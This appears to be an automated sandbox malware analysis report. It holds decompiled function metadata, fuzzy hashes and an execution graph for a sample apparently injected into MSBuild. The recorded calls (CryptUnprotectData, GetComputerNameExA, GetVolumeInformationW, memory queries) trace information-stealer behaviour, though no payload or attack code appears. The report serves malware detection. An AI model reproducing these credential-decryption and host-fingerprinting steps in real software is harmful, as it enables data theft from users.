                                            • __getptd.LIBCMT ref: 6CEFBFC3
                                              • Part of subcall function 6CEFEAE6: __getptd_noexit.LIBCMT ref: 6CEFEAE9
                                              • Part of subcall function 6CEFEAE6: __amsg_exit.LIBCMT ref: 6CEFEAF6
                                            • __getptd.LIBCMT ref: 6CEFBFD1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                            • String ID: csm
                                            • API String ID: 803148776-1018135373
                                            • Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                            • Instruction ID: c8acfa6e59bf539a1908ae4ca9f92972bc1814ee596c28dd66a1b94163636afc
                                            • Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                            • Instruction Fuzzy Hash: 9E014634A017048EDB34AF62D440AEDB3B6AF0821DF74596ED0719AB90DB319987CB91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: NameName::
                                            • String ID: {flat}
                                            • API String ID: 1333004437-2606204563
                                            • Opcode ID: cb12f6a0224499b1835008643da5ce9f6f10ab947419ee5e42cad1d8504c6c40
                                            • Instruction ID: c9dbc86b8f3e2c6007039e79dcb3e6ea3d02e32a573501895e29aca45ea13f69
                                            • Opcode Fuzzy Hash: cb12f6a0224499b1835008643da5ce9f6f10ab947419ee5e42cad1d8504c6c40
                                            • Instruction Fuzzy Hash: 2EF0E571354244AFCB10CF58C061FE83BB29B82B5AF04C181E90C0FB42C772D84AD790
                                            APIs
                                            • VariantInit.OLEAUT32(00000000), ref: 6CEAC4A4
                                            • VariantCopy.OLEAUT32(00000000,/5l), ref: 6CEAC4AF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$CopyInit
                                            • String ID: /5l
                                            • API String ID: 4248132287-2072523891
                                            • Opcode ID: 1101d968c17725a815216d40140cec52f31aafc9fe8952c4145de051b6b6b086
                                            • Instruction ID: a9f707d307c9b84596922caa077d2f6bdedba1c4dc33cc7f6c4b99fed7426e5e
                                            • Opcode Fuzzy Hash: 1101d968c17725a815216d40140cec52f31aafc9fe8952c4145de051b6b6b086
                                            • Instruction Fuzzy Hash: 89D022303001042B46022AA0CC0CEDB3B7C8F136943020020FE10CAB00D738C500ABF9
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,67D4BDE6), ref: 6CEA76AD
                                            • LeaveCriticalSection.KERNEL32(?,?,?,67D4BDE6), ref: 6CEA76FF
                                            • EnterCriticalSection.KERNEL32(67D4BDE6,?,?,?,67D4BDE6), ref: 6CEA770D
                                            • LeaveCriticalSection.KERNEL32(67D4BDE6,?,00000000,?,?,?,?,67D4BDE6), ref: 6CEA772A
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                              • Part of subcall function 6CEA6D40: _rand.LIBCMT ref: 6CEA6DEA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$_malloc_rand
                                            • String ID:
                                            • API String ID: 119520971-0
                                            • Opcode ID: a49708ff45816b04b8d1a5bb09b5996830ad6c2a41aee546dcd0f160bf9c657a
                                            • Instruction ID: 1c72a24c9e2c12826c03724b4a5fc796c2965f992c0f090f20e9ed29f82dc444
                                            • Opcode Fuzzy Hash: a49708ff45816b04b8d1a5bb09b5996830ad6c2a41aee546dcd0f160bf9c657a
                                            • Instruction Fuzzy Hash: 31216871904649AFC710DF95CC45BDBB7BCFF81258F214619E8169BA40EB71A905CBA0
                                            APIs
                                            • EnterCriticalSection.KERNEL32(?,?,?), ref: 6CEA95A9
                                            • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6CEA95CA
                                            • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CEA95DA
                                            • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6CEA95FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave
                                            • String ID:
                                            • API String ID: 3168844106-0
                                            • Opcode ID: 599acb5facb28d69d50c7b91a69a87ce88f17a5f840d7b2cb6cf22a1e7347f89
                                            • Instruction ID: 21424045a30929639f848e4e5867fd61d67ac6e60d84e2cf34baa44bcaf80a3e
                                            • Opcode Fuzzy Hash: 599acb5facb28d69d50c7b91a69a87ce88f17a5f840d7b2cb6cf22a1e7347f89
                                            • Instruction Fuzzy Hash: CD117272A05108EFC700CFD9E481DDEFBB8FF91218B21419AE5159BA10D731EA56CBA0

                                            Execution Graph

                                            Execution Coverage:16.2%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:11.3%
                                            Total number of Nodes:310
                                            Total number of Limit Nodes:17
                                            execution_graph 9829 41b840 9830 41b89f 9829->9830 9831 41b84c 9829->9831 9831->9831 9833 41a020 9831->9833 9836 41a100 9833->9836 9839 43b8d0 9836->9839 9838 41a159 9841 43b8f0 9839->9841 9840 43ba2e 9840->9838 9841->9840 9843 438c50 LdrInitializeThunk 9841->9843 9843->9840 9844 438dcb 9845 438e10 9844->9845 9845->9845 9846 438e6e 9845->9846 9848 438c50 LdrInitializeThunk 9845->9848 9848->9846 9849 43864a 9850 4382a6 9849->9850 9850->9849 9850->9850 9851 438715 9850->9851 9852 438369 LoadLibraryW 9850->9852 9852->9850 9853 438290 9852->9853 9858 438bcf 9859 438c10 RtlReAllocateHeap 9858->9859 9860 438bee 9858->9860 9861 438c3d 9859->9861 9860->9859 9867 41764e 9868 417670 9867->9868 9868->9868 9869 41767b RtlExpandEnvironmentStrings 9868->9869 9870 4176a1 9869->9870 9871 4176ac RtlExpandEnvironmentStrings 9870->9871 9874 43ba80 9871->9874 9873 4176d7 9875 43baa0 9874->9875 9876 43bbde 9875->9876 9878 438c50 LdrInitializeThunk 9875->9878 9876->9873 9878->9876 9879 4348cc 9880 4348d9 9879->9880 9883 43bd10 9880->9883 9885 43bd51 9883->9885 9884 434907 9887 43bdbe 9885->9887 9889 438c50 LdrInitializeThunk 9885->9889 9887->9884 9890 438c50 LdrInitializeThunk 9887->9890 9889->9887 9890->9884 9891 41f150 9894 43c080 9891->9894 9896 43c0a0 9894->9896 9895 41f175 9896->9895 9898 438c50 LdrInitializeThunk 9896->9898 9898->9895 9899 4198d0 9900 419928 9899->9900 9901 4198de 9899->9901 9901->9900 9903 4178c0 9901->9903 9904 41797a 9903->9904 9917 414310 9904->9917 9906 4179c9 9907 414310 LdrInitializeThunk 9906->9907 9908 417af9 9907->9908 9909 414310 LdrInitializeThunk 9908->9909 9910 417caf 9909->9910 9911 414310 LdrInitializeThunk 9910->9911 9912 417e10 9911->9912 9913 414310 LdrInitializeThunk 9912->9913 9914 417f59 9913->9914 9915 414310 LdrInitializeThunk 9914->9915 9916 4180b6 9915->9916 9918 414330 9917->9918 9918->9918 9919 43b8d0 LdrInitializeThunk 9918->9919 9920 4143ee 9919->9920 9921 413a54 9926 4098b0 9921->9926 9923 413a60 9924 4098b0 RtlExpandEnvironmentStrings 9923->9924 9925 413a6c 9924->9925 9927 4098c5 9926->9927 9929 409901 9926->9929 9930 434c80 9927->9930 9929->9923 9931 434d32 RtlExpandEnvironmentStrings 9930->9931 9932 434cf1 9930->9932 9932->9931 9933 4263d4 9934 4263ec 9933->9934 9935 426795 GetComputerNameExA 9934->9935 9936 4267e9 9935->9936 9936->9936 9937 426883 GetComputerNameExA 9936->9937 9938 4268d5 9937->9938 9939 4108d7 9940 4108e7 9939->9940 9941 4098b0 RtlExpandEnvironmentStrings 9940->9941 9942 410908 9941->9942 9943 416c59 9944 416d34 9943->9944 9945 41a020 LdrInitializeThunk 9944->9945 9946 41710f 9945->9946 9946->9946 9947 41a020 LdrInitializeThunk 9946->9947 9948 4175e3 9947->9948 9949 41b0d9 9950 41b0e7 9949->9950 9954 41fc40 9950->9954 9958 41b480 9950->9958 9951 41b15b 9955 41fdb0 9954->9955 9956 41fc59 9954->9956 9955->9951 9956->9956 9957 41a020 LdrInitializeThunk 9956->9957 9957->9955 9959 41b496 9958->9959 9967 41b530 9958->9967 9960 43b8d0 LdrInitializeThunk 9959->9960 9959->9967 9961 41b60d 9960->9961 9965 41b64a 9961->9965 9970 434ff0 9961->9970 9963 41b62f 9964 43b8d0 LdrInitializeThunk 9963->9964 9963->9967 9964->9965 9966 43bd10 LdrInitializeThunk 9965->9966 9965->9967 9969 41b66c 9966->9969 9967->9951 9969->9967 9969->9969 9985 438c50 LdrInitializeThunk 9969->9985 9971 43b8d0 LdrInitializeThunk 9970->9971 9982 435021 9971->9982 9972 435162 9986 436eb0 9972->9986 9973 4351a6 9990 4370e0 9973->9990 9974 4351d2 9998 436ff0 9974->9998 9979 435030 9979->9963 9980 4350de 9980->9972 9980->9973 9980->9974 9980->9979 9981 435202 9980->9981 9981->9979 10002 438c50 LdrInitializeThunk 9981->10002 9982->9972 9982->9973 9982->9974 9982->9979 9982->9980 9982->9981 10003 438c50 LdrInitializeThunk 9982->10003 9985->9967 9987 43518f 9986->9987 9988 436ec7 9986->9988 9987->9973 9987->9974 9987->9979 9988->9987 9988->9988 10004 438c50 LdrInitializeThunk 9988->10004 9991 437310 9990->9991 9993 4370fb 9990->9993 9991->9979 9992 4372de 9992->9991 9994 436ff0 LdrInitializeThunk 9992->9994 9993->9991 9996 4371ae 9993->9996 10005 438c50 LdrInitializeThunk 9993->10005 9994->9991 9996->9992 10006 438c50 LdrInitializeThunk 9996->10006 9999 4370ae 9998->9999 10000 437006 9998->10000 9999->9979 10000->9999 10007 438c50 LdrInitializeThunk 10000->10007 10002->9979 10003->9980 10004->9987 10005->9996 10006->9992 10007->9999 10008 408e60 10010 408e6a 10008->10010 10009 408edb ExitProcess 10011 408e90 GetSystemDirectoryW 10010->10011 10012 408e83 10010->10012 10011->10012 10012->10009 10013 427062 10014 427096 10013->10014 10015 434c80 RtlExpandEnvironmentStrings 10014->10015 10016 42710e 10015->10016 10017 427153 GetPhysicallyInstalledSystemMemory 10016->10017 10018 427171 10017->10018 10018->10018 10019 41d466 10020 41d476 10019->10020 10023 43c1b0 10020->10023 10022 41d49d 10024 43c1ef 10023->10024 10026 43c23e 10024->10026 10029 438c50 LdrInitializeThunk 10024->10029 10028 43c328 10026->10028 10030 438c50 LdrInitializeThunk 10026->10030 10028->10022 10028->10028 10029->10026 10030->10028 10031 419bef 10032 43ba80 LdrInitializeThunk 10031->10032 10033 419bf6 10032->10033 10034 43ba80 LdrInitializeThunk 10033->10034 10035 419c00 10034->10035 10036 42a2ed 10037 42a40e SysAllocString 10036->10037 10038 42a3ce 10036->10038 10038->10037 10039 427572 10040 42759c 10039->10040 10042 438c50 LdrInitializeThunk 10040->10042 10042->10040 10053 4186f6 10054 43bd10 LdrInitializeThunk 10053->10054 10055 418711 10054->10055 10056 41cef8 10057 41cfcb RtlExpandEnvironmentStrings 10056->10057 10058 41cfaf 10056->10058 10059 41d00a 10057->10059 10058->10057 10060 41d015 RtlExpandEnvironmentStrings 10059->10060 10061 41d06c 10060->10061 10062 4390fa 10063 439135 10062->10063 10065 43919e 10063->10065 10066 438c50 LdrInitializeThunk 10063->10066 10066->10065 10073 41388b 10074 41389b 10073->10074 10097 41c670 10074->10097 10076 4138a1 10077 4098b0 RtlExpandEnvironmentStrings 10076->10077 10078 4138ab 10077->10078 10079 4098b0 RtlExpandEnvironmentStrings 10078->10079 10080 4138c8 10079->10080 10081 41d280 LdrInitializeThunk 10080->10081 10082 4138de 10081->10082 10083 4098b0 RtlExpandEnvironmentStrings 10082->10083 10084 4138e8 10083->10084 10085 4208d0 LdrInitializeThunk 10084->10085 10086 413907 10085->10086 10087 420d80 LdrInitializeThunk 10086->10087 10088 413910 10087->10088 10089 4098b0 RtlExpandEnvironmentStrings 10088->10089 10090 41391a 10089->10090 10091 422d80 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings 10090->10091 10092 413930 10091->10092 10093 4098b0 RtlExpandEnvironmentStrings 10092->10093 10094 41393a 10093->10094 10095 42ef60 6 API calls 10094->10095 10096 413959 10095->10096 10098 41c739 RtlExpandEnvironmentStrings 10097->10098 10099 41c6ee 10097->10099 10100 41c77e 10098->10100 10099->10098 10101 41c78e RtlExpandEnvironmentStrings 10100->10101 10102 41c7fc 10101->10102 10102->10102 10103 43ba80 LdrInitializeThunk 10102->10103 10104 41c8f7 10103->10104 10105 41468c 10107 4146c1 10105->10107 10106 41472e 10107->10106 10109 438c50 LdrInitializeThunk 10107->10109 10109->10106 10110 42000c 10111 42019e 10110->10111 10112 43c080 LdrInitializeThunk 10111->10112 10113 4201e7 10112->10113 10117 420213 10113->10117 10118 4204ae 10113->10118 10120 4203dc 10113->10120 10129 43c470 10113->10129 10114 43c080 LdrInitializeThunk 10114->10117 10117->10114 10117->10118 10119 43c1b0 LdrInitializeThunk 10117->10119 10117->10120 10123 43caa0 10117->10123 10136 438c50 LdrInitializeThunk 10117->10136 10119->10117 10120->10118 10135 438c50 LdrInitializeThunk 10120->10135 10124 43cac0 10123->10124 10124->10124 10126 43cb6e 10124->10126 10137 438c50 LdrInitializeThunk 10124->10137 10128 43cc52 10126->10128 10138 438c50 LdrInitializeThunk 10126->10138 10128->10117 10130 43c4b1 10129->10130 10132 43c50e 10130->10132 10139 438c50 LdrInitializeThunk 10130->10139 10134 43c5de 10132->10134 10140 438c50 LdrInitializeThunk 10132->10140 10134->10117 10135->10118 10136->10117 10137->10126 10138->10128 10139->10132 10140->10134 10146 416114 10147 41614e 10146->10147 10148 414310 LdrInitializeThunk 10147->10148 10149 4161a2 10148->10149 10150 414310 LdrInitializeThunk 10149->10150 10151 41622f 10150->10151 10152 414310 LdrInitializeThunk 10151->10152 10153 41631d 10152->10153 10154 414310 LdrInitializeThunk 10153->10154 10155 4163bf 10154->10155 10155->10155 10156 434ff0 LdrInitializeThunk 10155->10156 10157 416555 10156->10157 10158 414310 LdrInitializeThunk 10157->10158 10159 41656b 10158->10159 10160 430616 10161 43061b 10160->10161 10162 4306af KiUserCallbackDispatcher GetSystemMetrics 10161->10162 10163 4306f9 DeleteObject 10162->10163 10165 430758 SelectObject 10163->10165 10167 43081a SelectObject 10165->10167 10168 430846 DeleteObject 10167->10168 10170 430895 10168->10170 10175 411619 10176 411629 10175->10176 10181 414760 10176->10181 10178 41163d 10179 4098b0 RtlExpandEnvironmentStrings 10178->10179 10180 411647 10179->10180 10182 414780 10181->10182 10182->10182 10183 41478b RtlExpandEnvironmentStrings 10182->10183 10184 4147a8 10183->10184 10185 4147b8 RtlExpandEnvironmentStrings 10184->10185 10186 414833 10185->10186 10186->10186 10187 43b8d0 LdrInitializeThunk 10186->10187 10188 41494a 10187->10188 10189 43959b 10190 4395d0 10189->10190 10193 43962e 10190->10193 10195 438c50 LdrInitializeThunk 10190->10195 10194 438c50 LdrInitializeThunk 10193->10194 10194->10193 10195->10193 10196 4144a7 10197 4144b1 10196->10197 10198 43bd10 LdrInitializeThunk 10197->10198 10199 4144c1 10198->10199 10200 43bd10 LdrInitializeThunk 10199->10200 10201 4144e0 10200->10201 10202 4384ab 10204 4384f6 10202->10204 10203 4385e3 LoadLibraryW 10203->10204 10204->10203 10204->10204 10209 41592f 10211 415939 10209->10211 10210 415b93 CryptUnprotectData 10211->10210 10212 434dad 10215 43ae40 10212->10215 10214 434dcc GetVolumeInformationW 10229 4383b7 10230 438416 10229->10230 10231 43846a LoadLibraryW 10229->10231 10230->10231 10232 438471 10231->10232 10240 412fbc 10241 412fd0 10240->10241 10242 41a020 LdrInitializeThunk 10241->10242 10243 4130ac 10242->10243 10244 4215bc 10245 42168f 10244->10245 10246 43c080 LdrInitializeThunk 10245->10246 10249 4216f0 10246->10249 10247 421840 10248 43c470 LdrInitializeThunk 10248->10249 10249->10247 10249->10248 10250 43caa0 LdrInitializeThunk 10249->10250 10252 438c50 LdrInitializeThunk 10249->10252 10250->10249 10252->10249

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                            • String ID:
                                            • API String ID: 1449868515-3916222277
                                            • Opcode ID: cd70b824810e98a6a0dd74e089ae4939813379ae9d6a4f6dd54e232c3b301a6b
                                            • Instruction ID: b70df4d09fca917dfa98c56f67c2eeb7f50677711d94b9cc0bf9bfd4c27e7214
                                            • Opcode Fuzzy Hash: cd70b824810e98a6a0dd74e089ae4939813379ae9d6a4f6dd54e232c3b301a6b
                                            • Instruction Fuzzy Hash: 9FA15DB4614B009FC364DF29D991A16BBF0FB49700F10896DE99AC7760D731B849CB56

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 280 4263c6-4263f3 282 4263f5-42640b 280->282 283 42645a-426465 280->283 285 426467 282->285 286 42640d-42640f 282->286 284 4264b9-4264bc 283->284 288 4264be-4264bf 284->288 287 426469-426470 285->287 289 426410-426456 286->289 290 426472-42647d 287->290 291 42647f-426495 287->291 292 4264c0-4264c9 288->292 289->289 293 426458 289->293 294 426498-4264a5 290->294 291->294 292->292 295 4264cb-42651a 292->295 293->287 296 4264b2-4264b7 294->296 297 4264a7-4264ae 294->297 298 42655e-426568 295->298 299 42651c-42651f 295->299 296->284 297->288 300 4264b0 297->300 302 42656a-42656b 298->302 303 42657b-426584 298->303 301 426520-42655c 299->301 300->295 301->298 301->301 304 426570-426579 302->304 305 426586-42658b 303->305 306 42659b-4265a8 303->306 304->303 304->304 307 426590-426599 305->307 308 4265b3-426612 call 43ae40 306->308 309 4265aa-4265b0 call 408720 306->309 307->306 307->307 315 426656-426660 308->315 316 426614 308->316 309->308 317 426662-426666 315->317 318 42667d 315->318 319 426620-426654 316->319 320 426670-426679 317->320 321 426680-426688 318->321 319->315 319->319 320->320 322 42667b 320->322 323 42668a-42668f 321->323 324 42669d 321->324 322->321 325 426690-426699 323->325 326 4266a0-4266c2 call 43ae40 324->326 325->325 327 42669b 325->327 329 4266c7-4266cb 326->329 327->326 330 4266d0-42670d 329->330 331 42670f 330->331 332 42673c-426746 330->332 335 426710-42673a 331->335 333 426748-42674f 332->333 334 42675d 332->334 336 426750-426759 333->336 337 426760-426768 334->337 335->332 335->335 336->336 338 42675b 336->338 339 42676a-42676f 337->339 340 42677d 337->340 338->337 341 426770-426779 339->341 342 426780-426790 call 43ae40 340->342 341->341 343 42677b 341->343 345 426795-4267e7 GetComputerNameExA 342->345 343->342 346 426827-42682e 345->346 347 4267e9 345->347 348 426830-426837 346->348 349 42684d 346->349 350 4267f0-426825 347->350 351 426840-426849 348->351 352 426853-42685b 349->352 350->346 350->350 351->351 353 42684b 351->353 354 42687d 352->354 355 42685d-426864 352->355 353->352 357 426883-4268d3 GetComputerNameExA 354->357 356 426870-426879 355->356 356->356 358 42687b 356->358 359 426921-426928 357->359 360 4268d5 357->360 358->357 362 42692a-42692b 359->362 363 42693b-426949 359->363 361 4268e0-42691f 360->361 361->359 361->361 366 426930-426939 362->366 364 42695b-4269b9 363->364 365 42694b-42694f 363->365 369 4269f2-4269f9 364->369 370 4269bb 364->370 367 426950-426959 365->367 366->363 366->366 367->364 367->367 372 4269fb-426a02 369->372 373 426a1d 369->373 371 4269c0-4269f0 370->371 371->369 371->371 374 426a10-426a19 372->374 375 426a23-426a2b 373->375 374->374 376 426a1b 374->376 377 426a3b-426a99 call 43ae40 375->377 378 426a2d-426a2f 375->378 376->375 383 426a9b 377->383 384 426ab9-426ac0 377->384 380 426a30-426a39 378->380 380->377 380->380 385 426aa0-426ab7 383->385 386 426ac2-426ac3 384->386 387 426adb-426ae8 384->387 385->384 385->385 388 426ad0-426ad9 386->388 389 426b06-426b0f 387->389 388->387 388->388 390 426bb2-426bf9 389->390 391 426b15-426b1c 389->391 392 426bfb 390->392 393 426c3f-426c46 390->393 394 426af0-426af2 391->394 395 426b1e-426b37 391->395 396 426c00-426c3d 392->396 397 426c5b-426c60 call 42c010 393->397 398 426c48-426c49 393->398 399 426af7-426b00 394->399 400 426b70-426b78 395->400 401 426b39-426b3c 395->401 396->393 396->396 407 426c65-426c88 397->407 404 426c50-426c59 398->404 399->389 406 426bae-426bb0 399->406 400->399 403 426b7e-426ba9 400->403 401->400 402 426b3e-426b66 401->402 402->399 403->399 404->397 404->404 406->390
                                            APIs
                                            • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 004267B9
                                            • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 004268A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2115179636.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd
                                            Similarity
                                            • API ID: ComputerName
                                            • String ID: SVZQ
                                            • API String ID: 3545744682-3438672366
                                            • Opcode ID: 6974411d3339ef7d4537fa75bf7ce38507dac59cd7e635de215504003c166d59
                                            • Instruction ID: d1b9ca03675c0ca073aa24b9971f355526ae4c6f74f3a69f0a3b2fe6d3a1ff85
                                            • Opcode Fuzzy Hash: 6974411d3339ef7d4537fa75bf7ce38507dac59cd7e635de215504003c166d59
                                            • Instruction Fuzzy Hash: 9F52B0742046918FE325CF29D4A0B22FBF1EF57304F69859DD0C68B392D739A846CBA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 408 4263d4-4263f3 410 4263f5-42640b 408->410 411 42645a-426465 408->411 413 426467 410->413 414 42640d-42640f 410->414 412 4264b9-4264bc 411->412 416 4264be-4264bf 412->416 415 426469-426470 413->415 417 426410-426456 414->417 418 426472-42647d 415->418 419 42647f-426495 415->419 420 4264c0-4264c9 416->420 417->417 421 426458 417->421 422 426498-4264a5 418->422 419->422 420->420 423 4264cb-42651a 420->423 421->415 424 4264b2-4264b7 422->424 425 4264a7-4264ae 422->425 426 42655e-426568 423->426 427 42651c-42651f 423->427 424->412 425->416 428 4264b0 425->428 430 42656a-42656b 426->430 431 42657b-426584 426->431 429 426520-42655c 427->429 428->423 429->426 429->429 432 426570-426579 430->432 433 426586-42658b 431->433 434 42659b-4265a8 431->434 432->431 432->432 435 426590-426599 433->435 436 4265b3-426612 call 43ae40 434->436 437 4265aa-4265b0 call 408720 434->437 435->434 435->435 443 426656-426660 436->443 444 426614 436->444 437->436 445 426662-426666 443->445 446 42667d 443->446 447 426620-426654 444->447 448 426670-426679 445->448 449 426680-426688 446->449 447->443 447->447 448->448 450 42667b 448->450 451 42668a-42668f 449->451 452 42669d 449->452 450->449 453 426690-426699 451->453 454 4266a0-42670d call 43ae40 452->454 453->453 455 42669b 453->455 459 42670f 454->459 460 42673c-426746 454->460 455->454 463 426710-42673a 459->463 461 426748-42674f 460->461 462 42675d 460->462 464 426750-426759 461->464 465 426760-426768 462->465 463->460 463->463 464->464 466 42675b 464->466 467 42676a-42676f 465->467 468 42677d 465->468 466->465 469 426770-426779 467->469 470 426780-4267e7 call 43ae40 GetComputerNameExA 468->470 469->469 471 42677b 469->471 474 426827-42682e 470->474 475 4267e9 470->475 471->470 476 426830-426837 474->476 477 42684d 474->477 478 4267f0-426825 475->478 479 426840-426849 476->479 480 426853-42685b 477->480 478->474 478->478 479->479 481 42684b 479->481 482 42687d 480->482 483 42685d-426864 480->483 481->480 485 426883-4268d3 